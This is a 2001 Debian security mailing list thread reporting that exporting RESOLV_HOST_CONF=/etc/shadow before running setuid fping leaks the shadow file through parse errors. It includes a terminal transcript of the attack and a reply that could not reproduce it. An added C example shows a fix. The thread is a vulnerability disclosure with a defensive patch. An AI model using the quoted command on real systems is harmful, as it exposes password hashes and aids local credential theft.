When I tried it, I did not get the same results.
-rwsr-xr-x 1 root root 19728 Oct 30 1999 /usr/bin/fping*

ldd `which fping`
        libc.so.6 => /lib/libc.so.6 (0x00127000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)

ping localhost
PING localhost (127.0.0.1): 56 data bytes
--- localhost ping statistics ---
6 packets transmitted, 0 packets received, 100% packet loss

fping localhost
localhost is unreachable

--
Kevin - [EMAIL PROTECTED]

-- Original message --

> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:
>
> Script started on Mon Jan 8 17:48:23 2001
> [EMAIL PROTECTED]:~$ export RESOLV_HOST_CONF=/etc/shadow
> [EMAIL PROTECTED]:~$ ping localhost
> PING localhost (127.0.0.1): 56 data bytes
> --- localhost ping statistics ---
> 2 packets transmitted, 0 packets received, 100% packet loss
> [EMAIL PROTECTED]:~$ fping localhost
> /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
> [snip]
> /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
> localhost is unreachable
> [EMAIL PROTECTED]:~$ ls -l `which fping`
> -rwsr-xr-x 1 root root 19728 May 15 2000 /usr/bin/fping
> [EMAIL PROTECTED]:~$ ls -l `which ping`
> -rwsr-xr-x 1 root root 15036 Dec 31 04:11 /bin/ping
> [EMAIL PROTECTED]:~$ ldd `which fping`
>         libc.so.6 => /lib/libc.so.6 (0x40021000)
>         /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
> [EMAIL PROTECTED]:~$ ldd `which ping`
>         libc.so.6 => /lib/libc.so.6 (0x40021000)
>         /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
> [EMAIL PROTECTED]:~$ exit
> Script done on Mon Jan 8 17:49:42 2001
>
> It seems to work for some setuid programs, but not others. I'm running the
> most recent packages from unstable as of today:
>
> ii libc6 2.2-9 GNU C Library: Shared libraries and Timezone
> ii netkit-ping 0.10-5 The ping utility from netkit
> ii fping 2.2b1-2 Send ICMP ECHO_REQUEST packets to network ho
>
> cheers,
>
> Thomas
>
> On Mon, 8 Jan 2001, thomas lakofski wrote:
>
>> From: thomas lakofski <[EMAIL PROTECTED]>
>> To: [EMAIL PROTECTED], debian-security@lists.debian.org
>> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
>> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>>
>> Hi,
>>
>> A friend of mine just tried this against my unstable box and successfully
>> obtained the contents of /etc/shadow.
>>
>> I imagine that this is a problem in libc -- I'll leave it to
>> [EMAIL PROTECTED] to file bug reports.
>>
>> cheers,
>>
>> Thomas
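
Added example, not part of the thread and not libc's own code: one way a resolver-style library could avoid the behaviour shown in the transcript above, by ignoring the RESOLV_HOST_CONF override in a set-uid or set-gid process and by reporting parse errors without echoing the offending line. The function names, the 256-byte line buffer and the two-keyword subset are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Set-uid/set-gid process: the invoker controls the environment, not the privileges. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Hypothetical helper: honour the RESOLV_HOST_CONF value only when unprivileged. */
const char *host_conf_path(const char *env_value, int privileged)
{
    if (env_value != NULL && *env_value != '\0' && !privileged)
        return env_value;
    return "/etc/host.conf";
}

/* Returns the number of rejected lines (keyword subset chosen for this example).
 * Diagnostics give file name and line number only, never the line text,
 * so a parse error cannot disclose the contents of the file being read. */
int parse_host_conf(FILE *in, const char *name, FILE *diag)
{
    char line[256];
    int lineno = 0, bad = 0, c;
    while (fgets(line, sizeof line, in) != NULL) {
        const char *p = line + strspn(line, " \t");
        lineno++;
        if (strchr(line, '\n') == NULL)   /* over-long line: discard the rest */
            while ((c = fgetc(in)) != EOF && c != '\n')
                ;
        if (*p == '\0' || *p == '\n' || *p == '#')
            continue;                     /* blank line or comment */
        if (strncmp(p, "order", 5) != 0 && strncmp(p, "multi", 5) != 0) {
            bad++;
            fprintf(diag, "%s: line %d: bad command\n", name, lineno);
        }
    }
    return bad;
}

int main(void)
{
    const char *path = host_conf_path(getenv("RESOLV_HOST_CONF"), running_privileged());
    FILE *f = fopen(path, "r");
    if (f == NULL) return 1;
    printf("%d rejected line(s) in %s\n", parse_host_conf(f, path, stderr), path);
    return 0;
}
```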